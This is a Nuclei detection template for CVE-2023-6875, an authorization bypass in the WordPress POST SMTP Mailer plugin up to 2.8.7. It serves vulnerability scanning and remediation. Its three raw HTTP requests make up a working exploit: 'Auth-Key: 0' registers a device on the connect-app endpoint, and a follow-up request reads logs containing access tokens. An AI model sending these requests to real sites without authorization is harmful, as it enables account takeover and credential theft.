nuclei-templates/http/cves/2023/CVE-2023-6875.yaml


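# Nuclei detection template for CVE-2023-6875 in the POST SMTP Mailer
# WordPress plugin (all versions up to and including 2.8.7, per `description`).
#
# Practitioner notes:
# - The check is active, not passive: it sends POSTs to the connect-app
#   endpoint with random device/token values. A match means the target
#   accepted them, so treat those values as test residue on the scanned site.
# - A match also means the third response carried log data containing
#   "access_token=". Handle stored scan output as sensitive.
# - Mitigation is the plugin update named in `remediation` (2.8.8).
id: CVE-2023-6875

info:
  name: WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.
  remediation: Fixed in 2.8.8
  reference:
    - https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60
    - https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6875
    - https://github.com/UlyssesSaicha/CVE-2023-6875
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6875
    # CWE-862 is "Missing Authorization".
    cwe-id: CWE-862
    epss-score: 0.05153
    epss-percentile: 0.92961
    cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # Must equal the number of raw requests below (three).
    max-request: 3
    vendor: wpexperts
    product: post_smtp_mailer
    framework: wordpress
    # The three queries fingerprint the plugin's asset path. A hit shows the
    # plugin is present, not that the installed version is vulnerable.
    shodan-query: http.html:/wp-content/plugins/post-smtp
    fofa-query: body=/wp-content/plugins/post-smtp
    publicwww-query: "/wp-content/plugins/post-smtp"
  tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts

# Random per-run values, so the token echoed in body_2 can be attributed to
# this scan rather than to a previously registered device.
variables:
  fcm_token: "{{randstr_1}}"
  device: "{{randstr_2}}"

http:
  - raw:
      # Requests 1 and 2 are identical; only the second response (body_2) is
      # inspected by the matchers.
      # NOTE(review): the reason for sending it twice is not visible here.
      # The literal `Auth-Key: 0` is presumably what reaches the type-juggling
      # comparison named in `description`; confirm against the changeset.
      - |
        POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
        Content-Type: application/x-www-form-urlencoded
      # Request 3 reads the log endpoint with the same headers. For triage on
      # sites that ran <= 2.8.7, review web logs for unexpected clients calling
      # either endpoint.
      - |
        GET /wp-json/post-smtp/v1/get-log HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}

    # Both expressions must hold (`condition: and`): body_2 reports success and
    # echoes this run's fcm_token, and body_3 returns a data payload containing
    # "access_token=". Requiring both avoids matching on status alone.
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")'
          - 'contains_all(body_3, "true,\"data\":", "access_token=")'
        condition: and
# NOTE(review): the digest below is the template's signature line. It
# presumably covers the content above, so any edit (comments included) would
# need re-signing before the template is treated as verified; confirm.
# digest: 4b0a0048304602210084ea25bc632778a481dd0545166e1484a4a3d1a752ada7e2a783adc2c7be5495022100dc5775f2bbc435230438bf01cbe56acfe2ed80489b51dfce16a6e14111069e20:922c64590222798bb761d5b6d8e72950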